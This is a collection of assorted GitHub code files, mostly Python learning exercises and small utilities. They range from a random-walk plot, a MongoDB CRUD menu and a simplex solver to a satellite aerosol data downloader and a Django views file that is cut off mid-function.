+{"seq_id":"4529907588","text":"# Modify rw_visual.py, replacing plt.scatter() with plt.plot().\n# To simulate the path of a pollen grain on the surface of a water drop, pass\n# rw.x_values and rw.y_values to plt.plot(), and specify a value for the\n# linewidth argument. Use 5000 points instead of 50,000 points.\n\nimport matplotlib.pyplot as plt\n\n# If the module is not in the same directory, Python cannot find it, so the\n# search path must be set up by adding the module's folder to the system path\nimport sys\nsys.path.append('..')\nfrom random_walk import RandomWalk\n\n# Keep simulating random walks as long as the program is active\nwhile True:\n\n    # Create a RandomWalk instance and plot all of the points it contains\n    rw = RandomWalk(5000)  # increased number of points; initially 5000\n    rw.fill_walk()\n\n    # Set the size of the plotting window\n    '''\n    The figure() function specifies the width, height, resolution and background\n    color of the chart. You pass the figsize parameter a tuple telling matplotlib\n    the size of the plotting window, in inches. Python assumes a screen resolution\n    of 80 pixels per inch; if the chart size specified above is not suitable,\n    adjust the numbers as needed. If you know your system's resolution, you can\n    pass it to figure() via the dpi parameter to make effective use of the\n    available screen space, like this:\n    plt.figure(dpi=128, figsize=(10,6)) \n    '''\n    plt.figure(figsize = (6,4))\n\n    '''\n    We use a colormap to indicate the order of the points in the walk, and remove\n    the black outline of each point so its color stands out. To color the points\n    according to their order in the walk, we pass the argument c a list containing\n    each point's position in the sequence. Since the points are drawn in order,\n    the list given to c just needs to contain the numbers 1~5000\n    '''\n    point_numbers = list(range(rw.num_points))\n    # zorder controls layering: higher values are drawn on top of lower ones\n    plt.plot(rw.x_values, rw.y_values, linewidth=1, zorder=1)  # with more points, make each point smaller\n\n    # Hide the axes\n    plt.axes().get_xaxis().set_visible(False)\n    plt.axes().get_yaxis().set_visible(False)\n\n    # Highlight the start and end points\n    plt.scatter(0, 0, c='green', edgecolors='none', s=100)\n    plt.scatter(rw.x_values[-1], rw.y_values[-1], c='red',\n        edgecolors='none', s=100, zorder=2)\n\n    plt.show()\n\n    keep_running = input(\"Make another walk? (y/n) :\")
(y/n) :\")\n if keep_running == \"n\":\n break","repo_name":"pangfeiyo/PythonLearn","sub_path":"Python:从入门到实践/从入门到实践代码/第15章 生成数据/15.3 随机漫步/动动手/15-3 分子运动.py","file_name":"15-3 分子运动.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20375809819","text":"#coding=utf-8\nimport pymongo\nconn=pymongo.MongoClient(host='127.0.0.1',port=27017)\ndb=conn.jianli\n\ndef find1():\n\ttcho=input('''\n\t查询所有文档请按a\n\t根据名字查询文档请按b\n\t根据电话查询文档请按c\n\t根据经历查询文档请按d\n\t返回上一层按q\n\t\t\t\t''') \n\tif tcho=='a':\n\t\tdata=db.jianli.find({},{'_id':0})\n\t\tfor i in data:\n\t\t\tprint('名字:'+i['name']+' 电话:'+i['num']+' 经历:'+i['exp'])\n\telif tcho=='b':\n\t\tename=input('请输入名字: ')\n\t\tdata=db.jianli.find({'name':ename},{'_id':0})\n\t\tfor i in data:\n\t\t\tprint('名字:'+i['name']+' 电话:'+i['num']+' 经历:'+i['exp'])\n\telif tcho=='c':\n\t\tenum=input('请输入电话: ')\n\t\tdata=db.jianli.find({'num':enum},{'_id':0})\n\t\tfor i in data:\n\t\t\tprint('名字:'+i['name']+' 电话:'+i['num']+' 经历:'+i['exp'])\n\telif tcho=='d':\n\t\teexp=input('请输入经历: ')\n\t\tdata=db.jianli.find({'exp':eexp},{'_id':0})\n\t\tfor i in data:\n\t\t\tprint('名字:'+i['name']+' 电话:'+i['num']+' 经历:'+i['exp'])\n\telif tcho=='q':\n\t\tpass\n\telse:\n\t\tprint('输入有误')\n\ndef del1():\n\ttcho=input('''\n\t根据名字删除文档请按a\n\t根据电话删除文档请按b\n\t根据经历删除文档请按c\n\t返回上一层按q\n\t\t\t\t''')\n\tif tcho=='a':\n\t\twhile 1:\n\t\t\tename=input('请输入名字: ')\n\t\t\tdata=db.jianli.find({'name':ename})\n\t\t\tif data.count()==0:\n\t\t\t\tt=input('''\n\t名字不存在\n\t请重新输入\n\t任意键继续\n\tq键退出\n\t\t\t\t\t''')\n\t\t\t\tif t=='q':\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\n\t\t\telse:\n\t\t\t\tdb.jianli.remove({'name':ename})\n\t\t\t\tprint('删除成功')\n\t\t\t\tbreak\n\telif tcho=='b':\n\t\twhile 1:\n\t\t\tenum=input('请输入号码: ')\n\t\t\tdata=db.jianli.find({'num':enum})\n\t\t\tif data.count()==0:\n\t\t\t\tt=input('''\n\t号码不存在\n\t请重新输入\n\t任意键继续\n\tq键退出\n\t\t\t\t''')\n\t\t\t\tif t=='q':\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdb.jianli.remove({'num':enum})\n\t\t\t\tprint('删除成功')\n\telif tcho=='c':\n\t\twhile 1:\n\t\t\teexp=input('请输入经历: ')\n\t\t\tdata=db.jianli.find({'exp':eexp})\n\t\t\tif data.count()==0:\n\t\t\t\tt=input('''\n\t经历不存在\n\t请重新输入\n\t任意键继续\n\tq键退出\n\t\t\t\t''')\n\t\t\t\tif t=='q':\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdb.jianli.remove({'exp':eexp})\n\t\t\t\tprint('删除成功')\n\telif tcho=='q':\n\t\tpass\n\telse:\n\t\tprint('输入有误')\ndef update1():\n\twhile 1:\n\t\tename=input('请输入名字: ')\n\t\tdata=db.jianli.find({'name':ename})\n\t\tif data.count()==0:\n\t\t\tt=input('''\n\t名字不存在\n\t请重新输入\n\t任意键继续\n\tq键退出\n\t\t\t\t''')\n\t\t\tif t=='q':\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tcontinue\n\t\telse:\n\t\t\tenum=input('请输入修改电话: ')\n\t\t\teexp=input('请输入修改经历: ')\n\t\t\tdb.jianli.update({'name':ename},{'$set':{'num':enum}})\n\t\t\tdb.jianli.update({'name':ename},{'$set':{'exp':eexp}})\n\t\t\tprint('修改成功')\n\t\t\tbreak\n\ndef ins1():\n\twhile 1:\n\t\tename=input('请输入名字: ')\n\t\tenum=input('请输入号码: ')\n\t\teexp=input('请输入经历: ')\n\t\ttcho2=input('确认信息请按yes\\n任意键重输\\nq键退出')\n\t\tif tcho2=='yes':\n\t\t\tdb.jianli.insert({'name':ename,'num':enum,'exp':eexp})\n\t\t\tprint('增加成功')\n\t\t\tbreak\n\t\telif tcho2=='q':\n\t\t\tbreak\n\t\telse:\n\t\t\tcontinue\n\nwhile 1:\n\n\ttype1=input('''\n\t查询请按1\n\t删除请按2\n\t增加请按3\n\t修改请按4\n\t退出请按5\n\t\t\t\t''')\n\n\tif type1=='1':\n\t\tfind1()\n\telif type1=='2':\n\t\tdel1()\n\telif type1=='3':\n\t\tins1()\n\telif 
\n\t\tupdate1()\n\telif type1=='5':\n\t\tbreak\n\telse:\n\t\tprint('Invalid input')\n\n\n","repo_name":"aallenchen2018/login-sys","sub_path":"林永金.py","file_name":"林永金.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72706004009","text":"from __future__ import print_function, unicode_literals, absolute_import, division\nfrom six.moves import range, zip, map, reduce, filter\n# from functools import reduce\nfrom sortedcollections import SortedDict\nimport collections\nfrom collections import Counter\nfrom tabulate import tabulate\nfrom math import floor, ceil\nfrom pathlib import Path\nfrom glob import glob\nfrom functools import wraps\nfrom time import time\nimport os\nimport re\n\n\nflatten = lambda l: [item for sublist in l for item in sublist]\n\ndef factors(n):\n    \"from https://stackoverflow.com/questions/6800193/what-is-the-most-efficient-way-of-finding-all-the-factors-of-a-number-in-python\"\n    return set(reduce(list.__add__,\n              ([i, n//i] for i in range(1, int(pow(n, 0.5) + 1)) if n % i == 0)))\n\ndef pfactors(n): \n    \"\"\"\n    Finds the prime factors of 'n'\n    https://stackoverflow.com/questions/14550794/python-integer-factorization-into-primes\n    \"\"\" \n    from math import sqrt \n    pFact, limit, check, num = [], int(sqrt(n)) + 1, 2, n \n    if n == 1: return [1] \n    for check in range(2, limit): \n        while num % check == 0: \n            pFact.append(check) \n            num /= check \n    if num > 1:\n        pFact.append(num)\n    return pFact\n\ndef rowscols(n,cols=8):\n    \"divide n things up into rows*columns things\"\n    rows,xt = divmod(n,cols)\n    if rows == 0:\n        rows,cols = 1,xt\n    return rows, cols\n\ndef timewindow(lst, t, l):\n    \"window of fixed length l into list lst. try to center around t.\"\n    assert l <= len(lst)\n    if t < l//2: t=l//2\n    if t >= len(lst) - l//2: t=len(lst) - ceil(l/2)\n    return lst[t-l//2:t+ceil(l/2)]\n\ndef print_sorted_counter(l):\n    s = SortedDict(Counter(l))\n    print(tabulate([s.keys(), s.values()]))\n\ndef sorted_alphanum( l ):\n    \"\"\" Sort the given iterable in the way that humans expect.\n    taken from https://stackoverflow.com/questions/2669059/how-to-sort-alpha-numeric-set-in-python\n    \"\"\" \n    convert = lambda text: int(text) if text.isdigit() else text \n    alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ] \n    return sorted(l, key = alphanum_key)\n\ndef path_base_ext(fname):\n    directory, base = os.path.split(fname)\n    base, ext = os.path.splitext(base)\n    return directory, base, ext\n\ndef pprint_list_of_dict(lod, keys=None):\n    if not keys:\n        keys = lod[0].keys()\n    table = [keys]\n    table = table + [d.values() for d in lod]\n    print(tabulate(table))\n\ndef timing(f):\n    @wraps(f)\n    def wrap(*args, **kw):\n        ts = time()\n        result = f(*args, **kw)\n        te = time()\n        print('func:%r args:[%r, %r] took: %2.4f sec' % (f.__name__, args, kw, te-ts))\n        return result\n    return wrap\n\ndef do(iter):\n    return [x for x in iter]\n\ndef groupbyn(list0, n):\n    return [list0[i:i+n] for i in range(0, len(list0), n)]\n\n## uwe's stuff\n\ndef _raise(e):\n    raise e\n\n# https://docs.python.org/3/library/itertools.html#itertools-recipes\ndef consume(iterator):\n    collections.deque(iterator, maxlen=0)\n\ndef compose(*funcs):\n    return lambda x: reduce(lambda f,g: g(f), funcs, x)\n\ndef pipeline(*steps):\n    return reduce(lambda f,g: g(f), steps)\n\n\n## print type hierarchy for arbitrary objects\n\n# def printtypes(obj):\n#     if hasattr(obj, '__len__'):\n#         print(type(obj))\n#         for x in obj:\n#             printtypes(x)\n\ndef parse_python_script_comments(filename):\n    lines = open(filename,'r').readlines()
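\n    # Lines containing triple quotes are paired up; each pair delimits one\n    # variable = \"\"\"...\"\"\" block whose name and text are extracted below.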
\n    block_indices = [i for i,line in enumerate(lines) if '\"\"\"' in line]\n    block_indices = groupbyn(block_indices,2)\n    textlist = []\n    for bi in block_indices:\n        varname = lines[bi[0]][:-6] # remove last bit from eg (info = \"\"\")\n        vartext = ''.join(lines[bi[0]+1:bi[1]])\n        textlist.append([varname, vartext])\n    return textlist\n\ndef glob_and_parse_filename(globname, n=3):\n    try:\n        lastfile = Path(sorted(glob(globname))[-1])\n        lastfile_number = int(lastfile.stem[-n:])\n        return lastfile_number\n    except IndexError as e:\n        print(e)\n        return None\n\n\nimport inspect\nimport difflib\nimport collections\nfrom collections import Sequence\n\ntry:\n    from colorama import Fore, Back, Style, init\n    init()\nexcept ImportError:  # fallback so that the imported classes always exist\n    class ColorFallback():\n        __getattr__ = lambda self, name: '' \n    Fore = Back = Style = ColorFallback()\n\ndef diff_func_source(f1,f2):\n    \"\"\"\n    works with functions, classes or entire modules\n    prints colored diff output to terminal\n    makes it easier to put large, similar functions into same file/module\n    \"\"\"\n    def color_diff(diff):\n        for line in diff:\n            if line.startswith('+'):\n                yield Fore.GREEN + line + Fore.RESET\n            elif line.startswith('-'):\n                yield Fore.RED + line + Fore.RESET\n            elif line.startswith('^'):\n                yield Fore.BLUE + line + Fore.RESET\n            else:\n                yield line\n\n    lines1 = inspect.getsourcelines(f1)\n    lines2 = inspect.getsourcelines(f2)\n    diff = color_diff([line for line in difflib.ndiff(lines1[0],lines2[0])])\n    for l in diff: print(l,end='')\n\ndef flatten(l):\n    for el in l:\n        if isinstance(el, collections.Iterable) and not isinstance(el, (str, bytes)):\n            yield from flatten(el)\n        else:\n            yield el\n\ndef recursive_map(func, seq):\n    def loop(func,seq):\n        if isinstance(seq, (list,set,tuple)):\n            for item in seq:\n                yield type(item)(loop(func,item))\n        elif isinstance(seq, dict):\n            for k,v in seq.items():\n                yield type(v)(loop(func,v))\n        else:\n            # seq is a scalar (leaf) value here\n            yield func(seq)\n    return type(seq)(loop(func,seq))\n\nfrom collections import Collection, Mapping\n\ndef recursive_map2(func, data):\n    apply = lambda x: recursive_map2(func, x)\n    if isinstance(data, Mapping):\n        return type(data)({k: apply(v) for k, v in data.items()})\n    elif isinstance(data, Collection) and not isinstance(data, str):\n        return type(data)(apply(v) for v in data)\n    else:\n        return func(data)\n\n# sigds are the significance digits\n# inputs are lists of names, values and uncertainties respectively\ndef _print_fres(names, vals, uncs, sigds = 2, rfmt = 'pm', ws = False):\n    try:\n        if all([str(u).lower() not in 'inf' for u in uncs]):\n            sigs = [\n                (re.search('[1-9]', str(u)).start()-2 \\\n                    if re.match('0\\.', str(u)) \\\n                    else -re.search('\\.', str(float(u))).start())+sigds \\\n                for u in uncs\n            ]\n            # significant digits rule in uncertainty\n        else:\n            print('Warning: infinity in uncertainty values')\n            sigs = [sigds] * len(uncs)\n    except TypeError:  # NaN or None\n        raise TypeError('Error: odd uncertainty values')\n\n    rfmt = rfmt.lower()\n    # this can be done better/prettier I think\n    if rfmt in ['fancy', 'pms']:  # pms stands for pmsign\n        res_str = '{{0}} = {{1:{ws}{nfmt}}} ± {{2:{ws}{nfmt}}}'\n    elif rfmt in ['basic', 'pm', 'ascii']:\n        res_str = '{{0}} = {{1:{ws}{nfmt}}}+/-{{2:{ws}{nfmt}}}'\n    elif rfmt in ['tex', 'latex']:\n        res_str = '${{0}} = {{1:{ws}{nfmt}}} \\\\pm {{2:{ws}{nfmt}}}$'\n    elif rfmt in ['s1', 'short1']:\n        res_str = '{{0}} = {{1:{ws}{nfmt}}} ± {{2:{ws}{nfmt}}}'\n        # not yet supported. To do: shorthand notation
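\n        # (Shorthand notation would render 1.234 ± 0.005 as 1.234(5).)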
\n    elif rfmt in ['s2', 'short2']:\n        res_str = '{{0}} = {{1:{ws}{nfmt}}}({{2:{ws}{nfmt}}})'\n    else:\n        raise KeyError('rfmt value is invalid')\n\n    for i in range(len(vals)):\n        try:\n            print((res_str.format(\n                nfmt = '1e' if uncs[i] >= 1000 or uncs[i] <= 0.001 \\\n                    # 1 decimal exponent notation for big/small numbers\n                    else (\n                        'd' if sigs[i] <= 0 \\\n                        # integer if uncertainty >= 10\n                        else '.{}f'.format(sigs[i])),\n                ws = ' ' if ws in [True, ' '] else ''\n                )\n            ).format(\n                names[i],\n                round(vals[i], sigs[i]),\n                round(uncs[i], sigs[i])\n                # round to allow non-decimal significances\n            )\n            )\n\n        except (TypeError, ValueError, OverflowError) as e:\n            print('{} value is invalid'.format(uncs[i]))\n            print(e)\n            continue\n    # to do: a repr method to get numbers well represented\n    # instead of this whole mess","repo_name":"mpicbg-csbd/detsegtra","sub_path":"segtools/python_utils.py","file_name":"python_utils.py","file_ext":"py","file_size_in_byte":8145,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"31589497111","text":"from functools import reduce\nfrom typing import Generator, List\n\n\ndef zip_generators(generator_list: List[Generator]):\n    \"\"\"\n    Combines the generators in `generator_list` into a single generator.\n\n    Parameters\n    ----------\n    generator_list : List[Generator]\n        The generators to zip together element-wise.\n\n    Examples\n    --------\n    >>> def sample_generator(f=0, t=10):\n    ...     for i in range(f, t):\n    ...         yield i\n    \n    >>> sample_generator1 = sample_generator(0, 10)\n    >>> sample_generator2 = sample_generator(5, 15)\n    >>> sample_generator3 = sample_generator(16, 29)\n    >>> sample_generator4 = sample_generator(30, 66)\n    >>> sample_generators: List[Generator] = [sample_generator1, sample_generator2, sample_generator3, sample_generator4]\n    >>> list_generator = map(list, zip_generators(sample_generators))\n    >>> next(list_generator)\n    [0, 5, 16, 30]\n    >>> next(list_generator)\n    [1, 6, 17, 31]\n    \"\"\"\n    assert len(generator_list) != 0, \"List is empty.\"\n\n    def _tuple_reducer(a, b):\n        for _element in zip(a, b):\n            if isinstance(_element[0], tuple):\n                yield _element[0] + (_element[1],)\n            else:\n                yield (_element[0],) + (_element[1],)\n\n    if len(generator_list) == 1:\n        return map(lambda el: (el,), generator_list[0])\n    else:\n        return reduce(lambda a, b: _tuple_reducer(a, b), generator_list)\n","repo_name":"tenkeyless/image-keras","sub_path":"image_keras/supports/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33286187711","text":"# Samsung afternoon problem #1\n# Implementation (simulation)\n\nn, m = map(int, input().split())\n\n\narr = [list(map(int, input().split())) for _ in range(n)]\nmoves = []\nfor i in range(m):\n    tmp = list(map(int, input().split()))\n    moves.append([tmp[0] - 1, tmp[1]])\n\nclouds = [[n-2, 0], [n-2, 1], [n-1, 0], [n-1, 1]]\n\ndx = [0, -1, -1, -1, 0, 1, 1, 1]\ndy = [-1, -1, 0, 1, 1, 1, 0, -1]\nfor i in range(m):\n    # step 1.\n    # move the clouds\n    move = moves[i]\n    next_clouds = []\n    for cloud in clouds:\n        x = cloud[0]\n        y = cloud[1]\n        d = move[0]\n        s = move[1]\n        nx = (n + x + dx[d] * s) % n\n        ny = (n + y + dy[d] * s) % n\n        next_clouds.append([nx, ny])\n\n    # step 2.\n    visited = [[False]* n for _ in range(n)]\n    for cloud in next_clouds:\n        x = cloud[0]\n        y = cloud[1]\n        arr[x][y] += 1\n        visited[x][y] = True\n    \n    # step 3\n    clouds = []\n\n    # step 4\n    cx = [-1, -1, 1, 1]\n    cy = [-1, 1, -1, 1]\n    for cloud in next_clouds:\n        x = cloud[0]\n        y = cloud[1]\n        count = 0\n        for i in range(4):
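\n            # Each diagonal neighbour that holds water adds 1 (the water-copying step).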
\n            nx = x + cx[i]\n            ny = y + cy[i]\n\n            if 0 <= nx < n and 0 <= ny < n and arr[nx][ny] >= 1:\n                count += 1\n\n        arr[x][y] += count\n    \n    # step 5\n\n    for i in range(n):\n        for j in range(n):\n            if arr[i][j] >= 2 and visited[i][j] == False:\n                arr[i][j] -= 2\n                clouds.append([i, j])\n\nans = 0\nfor i in range(n):\n    ans += sum(arr[i])\n\n\nprint(ans)\n","repo_name":"chulhee23/today_ps","sub_path":"BOJ/20000-24999/21610.py","file_name":"21610.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"40804632801","text":"from ModelBase import ModelBase\nfrom imports import *\n\n\nclass Model(ModelBase):\n    def __init__(self, model, dtg):\n        super().__init__(model, dtg)\n\n        self.field = \"aod\"\n        self.file_out = 'aod_geos5.nc'\n\n    def download(self):\n        dtg = lt.newdtg( self.dtg, -24 )\n        \n        #_Setup download URL\n        url = 'https://opendap.nccs.nasa.gov/dods/GEOS-5/'\\\n            + 'fp/0.25_deg/fcast/inst1_2d_hwl_Nx'\n        dap_file = 'inst1_2d_hwl_Nx.' + dtg[:8] + '_'+dtg[8:] \n            # +'z', removed from url June 6th\n\n        speciesDict = self.mod_dict['GEOS5']['specn']\n        #_Get GSFC name for species and create ncdf variable\n\n        out = Dataset( self.file_out, 'w', format='NETCDF3_CLASSIC' )\n        nt, ny, nx = (0,0,0)\n        ncdf = Dataset( url + '/' + dap_file )\n\n        for idx, k in enumerate(speciesDict.keys()):\n            spec = speciesDict[k]\n\n            logging.info(url + '/' + dap_file + \"?\" + spec)\n\n            if idx == 0:\n                nt, ny, nx = ncdf[spec].shape\n                out.createDimension( 'lon', nx )\n                out.createDimension( 'lat', ny )\n                out.createDimension( 'time', nt )\n\n            v = out.createVariable( k, 'f4', ('time','lat','lon') )\n            print(ncdf[spec])\n            for t in range(0, len(ncdf.variables['time'][:])):\n                v[t]= ncdf[spec][t]\n\n        out.close()\n        #print(ncdf)\n\n        # time = float(ncdf.variables['time'][0])\n        # atime = datetime.fromtimestamp(time)\n        # dtg_geos = datetime.strptime(time,\"%Y%m%d%H\")\n        # print(dtg_geos)\n        # file = atime + '_aod_geos5.nc' \n        \n        #_If the final file exists, skip\n\n        #_Attempt to join individual variable files \n        #utils.geos5_join( self.dtg, species, self.file_out)\n        \n","repo_name":"jroetman/backup","sub_path":"netcdf/models/GEOS5.py","file_name":"GEOS5.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34871418198","text":"import copy\n\nfrom simplex.utils import minimizing_index\n\n\ndef initialize_simplex(A, b, c):\n    rows = len(A)\n    cols = len(A[0])\n\n    N = [i for i in range(cols)]\n    B = [cols + i for i in range(rows)]\n    c = [c[idx] if idx < len(c) else 0 for idx in range(rows + cols)]\n    new_b = [0 if idx < cols else b[idx - cols] for idx in range(rows + cols)]\n    new_A = [[0 for j in range(rows + cols)] for i in range(rows + cols)]\n    \n    for i in range(rows):\n        for j in range(cols):\n            new_A[i + cols][j] = A[i][j]\n\n    return N, B, new_A, new_b, c, 0\n\n\ndef pivot(N: list, B: list, A: list, b: list, c: list, v: int, l: int, e: int):\n    N_new = copy.deepcopy(N)\n    B_new = copy.deepcopy(B)\n    A_new = [[0 for i in range(len(A[0]))] for j in range(len(A))]\n    b_new = [0 for i in range(len(b))]\n    c_new = [0 for i in range(len(c))]\n\n    b_new[e] = b[l] / A[l][e]\n\n    for j in N:\n        if j != e:\n            A_new[e][j] = A[l][j] / A[l][e]\n    A_new[e][l] = 1 / A[l][e]\n\n    for i in B:\n        if i != l:\n            b_new[i] = b[i] - A[i][e] * b_new[e]\n\n            for j in N:\n                if j != e:\n                    A_new[i][j] = A[i][j] - A[i][e] * A_new[e][j]\n            \n            A_new[i][l] = -A[i][e] * A_new[e][l]\n    \n    v_new = v + c[e] * b_new[e]
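\n\n    # Update the objective row so the entering variable's reduced cost becomes zero.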
\n\n    for j in N:\n        if j != e:\n            c_new[j] = c[j] - c[e] * A_new[e][j]\n    c_new[l] = -c[e] * A_new[e][l]\n\n    if e in N:\n        N_new.remove(e)\n        N_new.append(l)\n\n    if l in B:\n        B_new.remove(l)\n        B_new.append(e)\n\n    return N_new, B_new, A_new, b_new, c_new, v_new\n\n\ndef simplex(N: list, B: list, A: list, b: list, c: list, v: int):\n    x = list()\n\n    while(True):\n        delta = [0 for m in range(len(A))]\n\n        e = -1\n        for j in N:\n            if c[j] > 0:\n                e = j\n        if e == -1:\n            break\n        \n        for i in B:\n            if A[i][e] > 0:\n                delta[i] = b[i] / A[i][e]\n            else:\n                delta[i] = \"inf\"\n        \n        l = minimizing_index(delta, B)\n        if delta[l] == \"inf\":\n            raise Exception(\"The problem is unbounded\")\n        else:\n            N, B, A, b, c, v = pivot(N, B, A, b, c, v, l, e)\n    \n    for i in range(len(A)):\n        if i in B:\n            x.append(b[i])\n        else:\n            x.append(0)\n    \n    return x\n","repo_name":"ThinkingFrog/OptimizationMethods","sub_path":"LAB1/simplex/simplex.py","file_name":"simplex.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19955653294","text":"# Test 3\nfrom server import Server\nimport time\nimport json\nimport sys\n\ndef getargs(argv):\n    args = []\n    for arg in argv:\n        args.append(arg)\n    return args\n\n\ndef main():\n\n    args = getargs(sys.argv)\n    delivstate = args[1]\n    ADDR = '192.168.1.123'\n    PORT = 2001\n\n    # Instantiate server\n    s = Server(ADDR, PORT)\n    s.socket_init()\n    s.start()\n\n    # Connect to client\n    print(\"Waiting to connect ...\")\n    s.connect()\n    print(\"Connected to wifly at %s:%s\" % (s.client_addr[0], s.client_addr[1]))\n    print()\n\n    while True:\n\n        # Receive messages from client\n        buf = \"\"\n        while '!' not in buf:\n            buf += s.recvmsg()\n            if \"*HELLO*\" in buf:\n                buf = \"\"\n\n        buf = buf[:-1]\n        print(\"-----------------------------------------------------------------------------\")\n        print(\"Received Message: %s\" % buf)\n        print()\n        #msg_count += 1\n\n        json_obj = json.loads(buf)\n        objheld = json_obj['DELIV_SENSE']['OBJ']\n        if(int(objheld) == 1 and int(delivstate) == 1):\n            print(\"turn off\")\n            s.sendmsg('{\"SEQ\": 0, \"ACTION\": 0}!')\n\n        if(int(objheld) == 0 and int(delivstate) == 0):\n            print(\"turn on\")\n            s.sendmsg('{\"SEQ\": 0, \"ACTION\": 1}!')\n\n\n    s.disconnect()\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"samhmcg5/embedded","sub_path":"server/KarTesting/emagtest.py","file_name":"emagtest.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"12163040718","text":"#this is the life that we all want\n\n# Enter your code here. Read input from STDIN. Print output to STDOUT\n\n# Enter your code here. Read input from STDIN. Print output to STDOUT\n\nword = []\nwordy = ()\nallwords = \"\"\nfor _ in range(int(input())):\n    word.append(input().strip())\n    \nfor i in word:\n    if i not in wordy:\n        wordy += i,\nprint(len(wordy))\nprint(*[word.count(k) for k in wordy])\n\n\n#second solution by me\n# Enter your code here. Read input from STDIN. Print output to STDOUT\n\nvocab = {}\nfor x in range(int(input())):\n    k = input().strip()\n    if k in vocab.keys():\n        vocab[k] += 1\n    else:\n        vocab[k] = 1\nprint(len(vocab.keys()))\nprint(*vocab.values())\n\n\n\n# Enter your code here. Read input from STDIN. 
Print output to STDOUT from poorcoder\n\nvocab = {}\nfor i in range(int(input())):\n value = input()\n if not vocab.get(value, None):\n vocab[value]= 1\n else:\n vocab[value]+= 1\n\nprint(len(vocab))\nprint(*vocab.values())","repo_name":"hamzayn/My_HackerRank_Solutions","sub_path":"word_order.py","file_name":"word_order.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34033286892","text":"from django.shortcuts import render\nfrom django.http import HttpResponse,JsonResponse\nfrom django.views.decorators.csrf import csrf_protect\nfrom .models import Article, Story, BigDiscount, CrazySale, Category, Likedapp\nimport pdb, xmltodict, json\nimport requests\nfrom django import template\nimport base64\nfrom base64 import b64encode\n# from robokassa.forms import RobokassaForm\n\n\nfrom django.core import serializers\n\n\n\n# import pdb; pdb.set_trace()\n\ndef year_archive(request, year):\n a_list = Article.objects.filter(pub_date__year=year)\n context = {'year': year, 'article_list': a_list}\n return render(request, 'news/year_archive.html', context)\n\n\ndef month_archive(request, year, month):\n a_list = Article.objects.filter(pub_date__month=month)\n context = {'year': year, 'month': month, 'article_list': a_list}\n return render(request, 'news/month_archive.html', context)\n\ndef single_archive(request, idef):\n a_list = Article.objects.get(id=idef)\n context = {'idef': idef, 'article': a_list}\n return render(request, 'news/single_archive.html', context)\n\n\n\n\ndef main(request):\n stories = Story.objects.all()\n big_discs = BigDiscount.objects.all()\n crazySales = CrazySale.objects.all()\n categories = Category.objects.all()\n bonus_account = None\n userStory = []\n\n\n\n if 'Auth' in request.session:\n story_ge = requests.get(\"https://ipgeolocation.abstractapi.com/v1/?api_key=343192254d7649e7aed2655a9673c247\")\n \n\n story_data = story_ge.json()\n\n # print(data)\n print(story_data)\n\n\n \n\n\n\n\n userStory.append({'story': story_data})\n \n print('-------2-----')\n if 'storyuser' in request.session:\n\n # sessionlist = request.session['storyuser']\n # sessionlist.append(userStory)\n\n\n # sessionlist = request.session.get('storyuser')\n # sessionlist.append(userStory)\n\n print(request.session['storyuser'])\n\n else:\n request.session['storyuser'] = userStory\n print(request.session['storyuser'])\n\n\n\n headers = {\n 'Message-ID': '1',\n 'Message-Type': 'Request',\n 'Time': '2010-01-26 13:57:23',\n 'Terminal-Type': '333',\n 'Content-Length': '210',\n 'Content-Type': 'text/text; charset=utf-8',\n\n }\n\n \n\n obj_req = requests.post('http://91.103.111.34:9192/', data = '''\n \n \n Account, Holder_Card, Holder_Coupon, Holder_Contact, Holder_Coupon_Available\n \n '''+request.session['Auth']+'''\n \n \n ''', headers=headers)\n \n if obj_req.status_code == 200:\n\n print(obj_req.status_code)\n\n else:\n print(obj_req.status_code)\n\n\n obj = xmltodict.parse(obj_req.content)\n\n if 'Holder' in obj:\n\n request.session['HolderID'] = obj['Holder']['Holder_ID']\n\n \n cart = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Card_Code']\n \n\n\n bonus = obj['Holder']['Accounts']['Account']\n\n account = obj['Holder']\n\n\n if bonus:\n print(bonus)\n\n \n for val in bonus:\n # print(val['Balance'])\n if val['Account_Type_ID'] == '1':\n \n bonus_account = val['Balance']\n\n \n\n if not cart:\n qrcode = obj['Holder']['Holders_Cards']['Holder_Card']['Card']['Card_Code']\n else:\n qrcode 
